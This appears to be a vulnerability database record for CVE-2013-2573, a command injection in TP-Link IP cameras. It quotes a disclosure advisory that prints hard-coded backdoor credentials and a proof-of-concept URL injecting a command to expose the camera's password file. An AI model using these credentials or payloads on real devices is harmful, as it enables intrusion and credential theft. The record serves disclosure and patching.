ID

VAR-202001-0855


CVE

CVE-2013-2573


TITLE

plural  TP-Link IP Camera  In products  OS  Command injection vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2013-007125

DESCRIPTION

A Command Injection vulnerability exists in the ap parameter to the /cgi-bin/mft/wireless_mft.cgi file in TP-Link IP Cameras TL-SC 3130, TL-SC 3130G, 3171G. and 4171G 1.6.18P12s, which could let a malicious user execute arbitrary code. plural TP-Link IP Camera Products include OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. TP-LINK IP Cameras are network camera products. A remote attacker can bypass the authentication by using a hard-coded username and password for the affected product (see CVE-2013-2572), and then use this command to inject the vulnerability to execute arbitrary commands from the administrator's web interface. *Advisory Information* Title: TP-Link IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0318 Advisory URL: http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: TP-Link Release mode: Coordinated release 2. *Vulnerability Description* Multiple vulnerabilities have been found in TP-Link IP cameras based on firmware v1.6.18P12 and below, that could allow an unauthenticated remote attacker: 1. [CVE-2013-2572] to bypass user web interface authentication using hard-coded credentials. 2. This flaw can also be used to obtain all credentials of registered users. 4. *Vulnerable Packages* . Tests and PoC were run on: . TL-SC 3130 [CVE-2013-2572] works with this device only . TL-SC 3130G . TL-SC 3171G . 5. *Vendor Information, Solutions and Workarounds* Vendor provides the links to patched firmware versions. This software is *beta*, TP-Link will release the final versions with release notes and some new functions and fixes in the following days. http://www.tp-link.com/resources/software/TL-SC3430_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3430N_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3130_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3130G_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3171_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3171G_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC4171G_V1_130527.zip 6. *Credits* These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Hard-Coded Credentials in Administrative Web Interface* [CVE-2013-2572] TP-Link IP cameras use the Boa web server [1], a popular tiny server for embedded Linux devices. 'boa.conf' is the Boa configuration file, and the following account can be found inside: /----- # MFT: Specify manufacture commands user name and password MFT manufacture erutcafunam -----/ This account is not visible from the user web interface; users are not aware of the existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/': 1. 'manufacture.cgi' 2. 7.2. *OS Command Injection in wireless_mft.cgi* [CVE-2013-2573] The file '/cgi-bin/mft/wireless_mft.cgi', has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials showed in the previous section: /----- username: manufacture password: erutcafunam -----/ The following proof of concept copies the file where the user credentials are stored in the web server root directory: /----- http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales -----/ Afterwards, the user credentials can be obtained by requesting: /----- http://192.168.1.100/credenciales -----/ 8. *Report Timeline* . 2013-04-29: Core Security Technologies notifies the TP-Link Customer Support of the vulnerabilities. Publication date is set for May 28th, 2013. 2013-04-30: TP-Link team asks for a report with technical information. 2013-05-02: Technical details sent to TP-Link. 2013-05-12: Vendor notifies that a new firmware will be released around May 20th. 2013-05-16: Core asks vendor if they are ready for coordinated public disclosure on May 20th. 2013-05-17: Vendor notifies that they have fixed the firmware but the testing process won't be ready before May 24th. 2013-05-20: Core notifies that the advisory publication was re-scheduled for Monday 27th. 2013-05-23: Vendor sends a copy of the beta firmware in order to confirm if issues were fixed. 2013-05-27: Vendor notifies that consumers are able to download the Beta firmware from TP-Link website. The final release will be made public in the following days, and will increase some new functions. 2013-05-28: Advisory CORE-2013-0318 published. 9. *References* [1] http://www.boa.org/. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Trust: 2.52

sources: NVD: CVE-2013-2573 // JVNDB: JVNDB-2013-007125 // CNVD: CNVD-2013-06544 // BID: 60195 // PACKETSTORM: 121788

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2013-06544

AFFECTED PRODUCTS

vendor:tp linkmodel:tl-sc 3171gscope:lteversion:1.6.18p12

Trust: 1.0

vendor:tp linkmodel:tl-sc 4171gscope:lteversion:1.6.18p12

Trust: 1.0

vendor:tp linkmodel:tl-sc 3130gscope:lteversion:1.6.18p12

Trust: 1.0

vendor:tp linkmodel:tl-sc3130gscope:eqversion:1.6.18p12s

Trust: 0.8

vendor:tp linkmodel:tl-sc4171gscope:eqversion:1.6.18p12s

Trust: 0.8

vendor:tp linkmodel:tl-sc3171gscope:eqversion:1.6.18p12s

Trust: 0.8

vendor:tp linkmodel:ip cameras 1.6.18p12scope:lteversion:<=

Trust: 0.6

vendor:tp linkmodel:tl-sc 4171gscope: - version: -

Trust: 0.3

vendor:tp linkmodel:tl-sc 3171gscope: - version: -

Trust: 0.3

vendor:tp linkmodel:tl-sc 3130gscope: - version: -

Trust: 0.3

vendor:tp linkmodel:tl-scscope:eqversion:3130

Trust: 0.3

vendor:tp linkmodel:ip camera 1.6.18p12scope: - version: -

Trust: 0.3

sources: CNVD: CNVD-2013-06544 // BID: 60195 // JVNDB: JVNDB-2013-007125 // NVD: CVE-2013-2573

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-2573
value: CRITICAL

Trust: 1.0

NVD: CVE-2013-2573
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2013-06544
value: HIGH

Trust: 0.6

nvd@nist.gov: CVE-2013-2573
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2013-06544
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2013-2573
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.1

Trust: 1.0

NVD: CVE-2013-2573
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2013-06544 // JVNDB: JVNDB-2013-007125 // NVD: CVE-2013-2573

PROBLEMTYPE DATA

problemtype:CWE-78

Trust: 1.0

problemtype:OS Command injection (CWE-78) [NVD Evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2013-007125 // NVD: CVE-2013-2573

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 121788 // CNNVD: CNNVD-201305-615

TYPE

operating system commend injection

Trust: 0.6

sources: CNNVD: CNNVD-201305-615

PATCH

title:Top Pageurl:https://www.tp-link.com/en/

Trust: 0.8

title:Patch for TP-LINK IP Cameras command injection vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/34435

Trust: 0.6

title:TP-LINK IP Cameras Fixes for command injection vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=109050

Trust: 0.6

sources: CNVD: CNVD-2013-06544 // JVNDB: JVNDB-2013-007125 // CNNVD: CNNVD-201305-615

EXTERNAL IDS

db:NVDid:CVE-2013-2573

Trust: 3.4

db:BIDid:60195

Trust: 1.9

db:VULDBid:8912

Trust: 1.6

db:JVNDBid:JVNDB-2013-007125

Trust: 0.8

db:EXPLOIT-DBid:25812

Trust: 0.6

db:CNVDid:CNVD-2013-06544

Trust: 0.6

db:CNNVDid:CNNVD-201305-615

Trust: 0.6

db:PACKETSTORMid:121788

Trust: 0.1

sources: CNVD: CNVD-2013-06544 // BID: 60195 // JVNDB: JVNDB-2013-007125 // PACKETSTORM: 121788 // CNNVD: CNNVD-201305-615 // NVD: CVE-2013-2573

REFERENCES

url:https://www.coresecurity.com/advisories/tp-link-ip-cameras-multiple-vulnerabilities

Trust: 3.4

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/84574

Trust: 1.6

url:https://packetstormsecurity.com/files/cve/cve-2013-2573

Trust: 1.6

url:https://vuldb.com/?id.8912

Trust: 1.6

url:https://nvd.nist.gov/vuln/detail/cve-2013-2573

Trust: 1.5

url:http://www.securityfocus.com/bid/60195

Trust: 1.0

url:http://www.exploit-db.com/exploits/25812/

Trust: 0.6

url:http://www.tp-link.com/en/

Trust: 0.3

url:http://192.168.1.100/credenciales

Trust: 0.1

url:http://corelabs.coresecurity.com.

Trust: 0.1

url:http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Trust: 0.1

url:http://www.tp-link.com/resources/software/tl-sc3171_v1_130527.zip

Trust: 0.1

url:http://www.tp-link.com/resources/software/tl-sc3130_v1_130527.zip

Trust: 0.1

url:http://www.tp-link.com/resources/software/tl-sc4171g_v1_130527.zip

Trust: 0.1

url:http://www.coresecurity.com.

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-2572

Trust: 0.1

url:http://www.tp-link.com/resources/software/tl-sc3130g_v1_130527.zip

Trust: 0.1

url:http://www.boa.org/.

Trust: 0.1

url:http://corelabs.coresecurity.com

Trust: 0.1

url:http://www.tp-link.com/resources/software/tl-sc3430n_v1_130527.zip

Trust: 0.1

url:http://creativecommons.org/licenses/by-nc-sa/3.0/us/

Trust: 0.1

url:http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales

Trust: 0.1

url:http://www.tp-link.com/resources/software/tl-sc3430_v1_130527.zip

Trust: 0.1

url:http://www.tp-link.com/resources/software/tl-sc3171g_v1_130527.zip

Trust: 0.1

sources: CNVD: CNVD-2013-06544 // BID: 60195 // JVNDB: JVNDB-2013-007125 // PACKETSTORM: 121788 // CNNVD: CNNVD-201305-615 // NVD: CVE-2013-2573

CREDITS

Nahuel Riva and Francisco Falcon from Core Exploit Writers Team

Trust: 0.9

sources: BID: 60195 // CNNVD: CNNVD-201305-615

SOURCES

db:CNVDid:CNVD-2013-06544
db:BIDid:60195
db:JVNDBid:JVNDB-2013-007125
db:PACKETSTORMid:121788
db:CNNVDid:CNNVD-201305-615
db:NVDid:CVE-2013-2573

LAST UPDATE DATE

2024-08-14T14:19:11.760000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2013-06544date:2013-06-16T00:00:00
db:BIDid:60195date:2013-05-28T00:00:00
db:JVNDBid:JVNDB-2013-007125date:2020-02-14T00:00:00
db:CNNVDid:CNNVD-201305-615date:2020-05-26T00:00:00
db:NVDid:CVE-2013-2573date:2020-01-31T19:10:27.593

SOURCES RELEASE DATE

db:CNVDid:CNVD-2013-06544date:2013-06-04T00:00:00
db:BIDid:60195date:2013-05-28T00:00:00
db:JVNDBid:JVNDB-2013-007125date:2020-02-14T00:00:00
db:PACKETSTORMid:121788date:2013-05-28T20:22:22
db:CNNVDid:CNNVD-201305-615date:2013-05-30T00:00:00
db:NVDid:CVE-2013-2573date:2020-01-29T19:15:12.387